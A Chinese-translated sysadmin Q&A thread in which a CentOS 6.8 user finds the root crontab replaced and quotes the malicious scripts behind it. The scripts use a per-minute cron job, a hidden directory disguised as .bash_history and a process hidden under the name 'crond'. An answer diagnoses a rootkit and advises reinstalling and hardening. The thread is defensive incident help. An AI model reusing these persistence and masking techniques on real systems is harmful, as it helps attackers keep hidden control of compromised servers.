centos：root 用户的 crontab 被删除并替换 - 恶意代码？

Question

我想弄清楚我的 /var/spool/crontab/root 是否被病毒或恶意代码覆盖：

我今天早上醒来，我的 /var/spool/crontab/root 文件是空的，除了这一行，这不是我写的：

* * * * * /usr/home/.bash_history/update > /dev/null 2>&1

我查找了这个设置为运行的 update 文件，它包含以下内容：

#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null

该更新文件调用名为运行的文件，其中包含：

#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi

以下是 /usr/home 目录的全部内容，我不认识： 我是运行宁centos6.8

Answer 1

我认为您被黑客攻击了，可能是有人使用可下载的 rootkit。任何拥有调制解调器的白痴都可以使用它们，其中许多人在成功入侵后甚至不知道如何处理系统。

最安全的做法是从头开始重新安装 OS，并且这次使用 much 更强的密码。（抱歉，"pa$$w0rd" 不要删掉它。）您可以尝试更改密码并搜索系统中的任何可疑内容，但很有可能发生了您永远无法识别的更改。

我有一个系统被黑了一次，他们替换了 "ls"、"ps"，谁知道还有哪些其他命令跳过了他们的干预，这使得 100% 变得更加困难确定我们已经找到并修复了他们的所有更改。

重新安装后，查看如何将影子哈希转换为使用 SHA512。默认的散列算法存储在 /etc/login.defs 中，可能是 MD5，现在还不够强大。但即使使用更强的哈希值，许多弱密码也会很快遭到暴力攻击。

在您使用它的同时，您还可以获取 CentOS 6.9，其中将包含更多安全补丁。

centos：root 用户的 crontab 被删除并替换 - 恶意代码？

centos: root user's crontab gets deleted and replaced - malicious code?

cron

centos

centos6